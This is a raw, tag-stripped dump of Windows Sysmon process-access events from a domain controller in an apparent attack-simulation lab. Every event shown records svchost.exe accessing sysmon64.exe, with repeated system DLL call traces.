15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001608Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001607Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001606Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001605Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001604Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001603Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001602Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001601Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001600Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001599Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001598Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001597Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001596Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001595Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001594Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001593Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001592Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001591Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001590Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001589Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001588Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001587Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001586Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001585Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C: